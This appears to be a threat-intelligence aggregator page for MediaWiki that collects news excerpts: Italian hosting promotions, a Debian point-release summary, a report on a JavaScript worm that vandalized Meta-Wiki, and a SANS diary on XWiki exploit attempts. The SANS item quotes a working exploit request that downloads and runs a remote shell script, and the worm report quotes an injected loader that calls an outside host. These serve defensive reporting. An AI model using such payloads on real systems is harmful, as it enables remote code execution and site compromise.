Search/mediawiki
Vendor

mediawiki

Known CVEs
0
Highest CVSS
In KEV
0
Vendor
abusefilter
Connections
23 relationships
Sito web gratis, con Ionos hosting europeo gratis per 1 anno 200 GB di spazio: come funziona l’offerta del piano Plus
Un hosting gratis per un anno è la nuova proposta di Ionos dedicata a professionisti, aziende e privati che vogliono avviare un nuovo progetto online riducendo i costi iniziali senza rinunciare a prestazioni e sicurezza. La promozione di Ionos permette di utilizzare il piano Plus a 0 euro al mese per i primi 12 mesi, con un risparmio complessivo di 120 euro rispetto al prezzo ordinario. Oltre all’aspetto economico, Ionos punta su un’infrastruttura interamente europea e su un modello di gestione dei dati che risponde esclusivamente alla normativa dell’Unione Europea. Indice degli argomenti La promozione di Ionos interessa esclusivamente il piano Plus, progettato per siti web in crescita che richiedono maggiore capacità di elaborazione, più spazio di archiviazione e risorse dedicate. Per i primi 12 mesi il canone è azzerato. Dal tredicesimo mese il costo diventa pari a 9 euro al mese, IVA esclusa. Nel pacchetto sono inclusi: 200 GB di spazio su unità NVMe SSD; dominio gratuito per un anno; certificato SSL Wildcard; 2 caselle e-mail professionali; traffico illimitato; CDN per accelerare il caricamento delle pagine; scanner antimalware; assistenza tecnica disponibile 24 ore su 24. Prima di scegliere il piano è utile confrontarlo con le altre soluzioni disponibili. L’elemento che caratterizza maggiormente l’offerta è la localizzazione dell’infrastruttura. Ionos è una società tedesca controllata da United Internet AG e opera esclusivamente nel quadro normativo della Germania e dell’Unione Europea. L’assenza di una capogruppo statunitense significa che il provider non è soggetto a richieste extraterritoriali provenienti dagli Stati Uniti. I dati ospitati rimangono quindi protetti secondo la normativa europea, un aspetto sempre più rilevante per aziende e professionisti che trattano informazioni sensibili o desiderano mantenere il pieno controllo della propria infrastruttura digitale. A questo si aggiunge una disponibilità del servizio dichiarata pari al 99,99%, resa possibile da sistemi ridondanti e georidondanti che contribuiscono a limitare il rischio di interruzioni. La sicurezza rappresenta uno dei punti di forza della piattaforma. Il piano Plus comprende diverse funzionalità dedicate alla protezione dei siti web, tra cui: protezione contro gli attacchi DDoS; certificato SSL Wildcard incluso; backup automatici fino a sei giorni; scansione continua contro malware; monitoraggio costante delle minacce. Questi strumenti aiutano a ridurre la superficie di attacco e aumentano la resilienza dell’infrastruttura senza richiedere configurazioni aggiuntive da parte dell’utente. L’offerta non si limita allo spazio di archiviazione. Ionos mette infatti a disposizione una piattaforma pensata anche per sviluppatori e amministratori di sistema. Tra gli strumenti disponibili figurano: supporto per PHP 8.1, 8.2 e 8.3; accesso SSH, SFTP e WP-CLI; gestione dei repository Git; installazione automatica di oltre 70 applicazioni web. Tra le piattaforme installabili con pochi clic sono presenti WordPress, Joomla, Drupal, MediaWiki e numerose soluzioni dedicate all’e-commerce e allo sviluppo software. Un ulteriore vantaggio è rappresentato dalla possibilità di aumentare facilmente le risorse disponibili senza effettuare migrazioni complesse, accompagnando così la crescita del progetto nel tempo. A completare l’offerta è il servizio di assistenza in lingua italiana, operativo 24 ore su 24 tramite i canali di supporto del provider. Durante gli orari lavorativi è inoltre disponibile un consulente personale dedicato, che può affiancare il cliente nella configurazione dei servizi e nella gestione delle principali esigenze tecniche.
cybersecurity360.itJul 9, 2026extracted
Hosting europeo, con Ionos il primo anno è gratuito: dettagli e vantaggi
Hosting europeo gratis con Ionos per 12 mesi: chi cerca un servizio con infrastruttura localizzata nel vecchio continente e costi iniziali ridotti può guardare alla nuova iniziativa del provider tedesco, tra i principali operatori del settore in Europa. Essendo una società interamente tedesca (controllata da United Internet AG), Ionos risponde esclusivamente alla giurisdizione della Germania e dell’Unione Europea. Non avendo una capogruppo negli Stati Uniti, offre una totale immunità legale da ingiunzioni extraterritoriali. I dati sono protetti da tentativi di spionaggio industriale o richieste di accesso governativo non autorizzate dall’UE La promozione di Ionos permette di utilizzare il piano Plus senza alcun costo per 12 mesi. L’offerta si rivolge a professionisti, aziende e privati che desiderano avviare un nuovo progetto online. Indice degli argomenti La promozione di Ionos riguarda il piano Plus, una soluzione pensata per siti web in crescita che richiedono maggiore capacità di elaborazione e spazio di archiviazione. Per i primi 12 mesi il costo è pari a 0 euro al mese, mentre dal secondo anno il canone passa a 9 euro al mese IVA esclusa. Il vantaggio economico complessivo raggiunge i 120 euro. Tra i servizi inclusi figurano: 200 GB di spazio su unità NVMe SSD; dominio gratuito per un anno; certificato SSL Wildcard incluso; 2 caselle e-mail; traffico illimitato; CDN per migliorare le prestazioni; scanner antimalware; supporto clienti disponibile 24 ore su 24. Prezzi IVA esclusa. Uno degli aspetti più rilevanti dell’offerta di Ionos è la presenza di data center europei e di un’infrastruttura progettata per garantire elevati standard di affidabilità. Ionos dichiara una disponibilità del servizio pari al 99,99%, supportata da sistemi ridondanti e georidondanti. Questo approccio consente di ridurre il rischio di interruzioni e di mantenere i servizi online anche in presenza di guasti o anomalie. Per molte aziende europee la localizzazione dei dati rappresenta inoltre un elemento importante dal punto di vista normativo e della gestione della sicurezza informatica. La piattaforma include diverse funzionalità dedicate alla protezione dei siti web: protezione DDoS; certificato SSL Wildcard; backup automatici fino a sei giorni; scansione malware continua; monitoraggio delle minacce. Questi strumenti permettono di migliorare la resilienza dell’infrastruttura e di ridurre i rischi associati agli attacchi informatici. Ionos punta anche sulla componente tecnica. I piani mettono a disposizione tecnologie come: PHP 8.1, 8.2 e 8.3 accesso SSH, SFTP, WP-CLI gestione Git installazione automatica di oltre 70 applicazioni web Tra queste ultime figurano WordPress, Joomla, Drupal, MediaWiki e numerose piattaforme dedicate all’e-commerce e allo sviluppo software. La possibilità di aumentare le risorse senza migrazioni complesse rappresenta un ulteriore vantaggio per chi prevede una crescita progressiva del traffico o dei contenuti ospitati. A completare l’offerta troviamo un servizio di assistenza in lingua italiana disponibile 24 ore su 24 e un consulente personale dedicato durante gli orari lavorativi.
cybersecurity360.itJun 18, 2026extracted
Debian 13.5 point release lands with security fixes, bug patches
Debian 13.5 point release lands with security fixes, bug patches Debian 13.5 is the fifth point release for the stable distribution “trixie.” The update folds in roughly 100 Debian Security Advisories and corrections for more than 130 source packages, covering everything from the Linux kernel and Apache HTTP Server to OpenSSH, sudo, systemd, OpenSSL, glibc, and FreeRDP. Fresh installer images carrying the same fixes will follow at the regular download locations. Sysadmins running trixie do not need to reinstall. Existing media remain valid, and machines already pulling from security.debian.org will find that most of the patches in 13.5 are already on disk. The headline items include a new Apache upstream release that closes an authentication bypass and a use-after-free flaw, a privilege escalation fix in sudo, an nspawn container escape patch in systemd, multiple OpenSSH corrections affecting scp and key handling, and a sweeping FreeRDP3 update that resolves dozens of CVEs. One package, dav4tbsync, was withdrawn because Thunderbird 140 now covers its functionality. Wide range of package corrections The miscellaneous bugfix section covers more than a hundred source packages. Apache HTTP Server moves to a new upstream stable release that addresses a use-after-free flaw (CVE-2026-23918), a privilege escalation issue (CVE-2026-24072), an authentication bypass (CVE-2026-33006), HTTP response splitting (CVE-2026-33523), and several out-of-bounds read and NULL pointer dereference conditions. OpenSSH receives corrections covering scp behavior around setuid and setgid bits (CVE-2026-35385), a command execution flaw (CVE-2026-35386), incomplete enforcement of PubkeyAcceptedAlgorithms and HostbasedAcceptedAlgorithms for ECDSA keys (CVE-2026-35387), connection multiplexing handling in proxy mode (CVE-2026-35388), and the authorized_keys “principals” option (CVE-2026-35414). Sudo gains a fix for a privilege escalation flaw (CVE-2026-35535). Systemd moves to a new upstream stable release and addresses an nspawn container escape (CVE-2026-40226), code execution issues (CVE-2026-40225 and CVE-2026-4105), and a freeze condition (CVE-2026-29111). The glibc package corrects DNS response handling errors tracked as CVE-2026-4437 and CVE-2026-4438, along with an assertion failure (CVE-2026-4046). FreeRDP3 sees one of the largest single-package updates, with corrections for dozens of CVEs spanning use-after-free conditions, buffer overflows, out-of-bounds reads, and denial of service flaws. The OpenSSL package also moves to a new upstream stable release. Other notable packages receiving security or stability fixes include curl, nginx, rsync, jq, jpeg-xl, libarchive, libcap2, sed, nano, exim4, dovecot, and python3.13. Security advisories rolled in The release incorporates roughly one hundred Debian Security Advisories. Among the packages covered are the Linux kernel, Chromium, Firefox ESR, Thunderbird, OpenSSL, OpenSSH, BIND 9, MediaWiki, GIMP, MuPDF, Pillow, Roundcube, Dovecot, Tor, OpenJDK 21, OpenJDK 25, Apache HTTP Server, Wireshark, LibreOffice, Prosody, strongSwan, and several PowerDNS components. Three separate kernel advisories appear in the list, reflecting ongoing Linux maintenance across the trixie cycle. Installer and infrastructure The Debian Installer was rebuilt to include the fixes pulled into stable through this point release, including a bump of the Linux ABI to 6.12.86+deb13. Supporting data packages received routine refreshes. The tzdata package picks up an updated time zone database with corrections for British Columbia, and distro-info-data adds an entry for Ubuntu 26.10 “Stonking Stingray.” The libdatetime-timezone-perl package was updated to match the new tzdata. Administrators can apply the changes by running their normal package management update against any Debian mirror.
helpnetsecurity.comMay 17, 2026extracted
Wikipedia hit by self-propagating JavaScript worm that vandalized pages
Update: Added Wikimedia Foundation's statement below and made a correction to denote it was only the Meta-Wiki that was vandalized. The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages. Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages. Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes. The JavaScript worm According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code. The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects. Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account. BleepingComputer's review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user's common.js and Wikipedia's global MediaWiki:Common.js, which is used by everyone. MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User: /common.js, which are executed in editors’ browsers to customize the wiki interface. After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges: User-level persistence: it tried to overwrite User: /common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in. Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script. If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below. The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader. [[File:Woodpecker10.jpg|5000px]] [[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]] According to BleepingComputer's analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted. As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts. During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "supressed" and are no longer visible in the change histories. At the time of writing, the injected code has been removed, and editing is once again possible. However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained. Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored. "Earlier today, Wikimedia Foundation staff were conducting a security review of user-authored code on Wikipedia. During that review, we activated dormant code that was then quickly identified to be malicious. As a preventative measure, we temporarily disabled editing on Wikipedia and other Wikimedia projects while we removed the malicious code and confirmed the website was safe for user activity. The security issue behind this disruption has now been resolved. The code was active for a 23 minute period. During that time, it changed and deleted content on Meta-Wiki – which is now being restored – but it did not cause permanent damage. We have no evidence that Wikipedia was under attack, or that personal information was breached as part of this incident. We are developing additional security measures to minimize the risk of this kind of incident happening again. Updates continue to be made available via the Foundation's public incident log." Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMar 5, 2026extracted
XWiki SolrSearch Exploit Attempts (CVE-2025-24893) with link to Chicago Gangs/Rappers, (Mon, Nov 3rd)
XWiki describes itself as "The Advanced Open-Source Enterprise Wiki" and considers itself an alternative to Confluence and MediaWiki. In February, XWiki released an advisory (and patch) for an arbitrary remote code execution vulnerability. Affected was the SolrSearch component, which any user, even with minimal "Guest" privileges, can use. The advisory included PoC code, so it is a bit odd that it took so long for the vulnerability to be widely exploited. NIST added the vulnerability to its "Known Exploited Vulnerabilities" list this past Friday. Our data shows some reconnaissance scans starting in July, but actual exploit attempts did not commence until yesterday. The exploit requests are relatively straightforward: GET /xwiki/bin/get/Main/SolrSearch?media=rss&text={{async async=false}}{{groovy}}['sh', '-c', 'wget -qO- http://74.194.191.52/rondo.sdu.sh|sh'].execute().text{{/groovy}}{{/async}} HTTP/1.1 Host: [honeypot IP address] User-Agent: Mozilla/5.0 ([email protected]) Connection: close Accept: */* The exploit attempt is loading a shell script from 74.194.191.52. The script is no longer present on the site. However, the site displays what appears to be an advertisement for a fairly average rap song, and it also displays the same email address as the one included in the user agent. Maybe the actual attacker's email address? I will try to reach out to see what I get back. The page returned, instead of the malware, is advertising the Chicago rapper "King Lil Jay". King Lil Jay is a rival of RondoNumbaNine, and both are currently incarcerated. The reference to "rondo" in the malware script name is likely referring to RondoNumbaNine. In the past, both rappers were affiliated with opposing gangs in Chicago, and in part, participated in and celebrated in their music the violence associated with the gang rivalry. While, according to some reports [3], the two rappers ended their rivalry, it is odd to see some of this come up in a random online attack. [1] https://www.xwiki.org/xwiki/bin/view/Main/WebHome [2] https://nvd.nist.gov/vuln/detail/CVE-2025-24893 [3] https://www.youtube.com/shorts/llh53PYnHWQ -- Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu Twitter|
isc.sans.eduNov 3, 2025extracted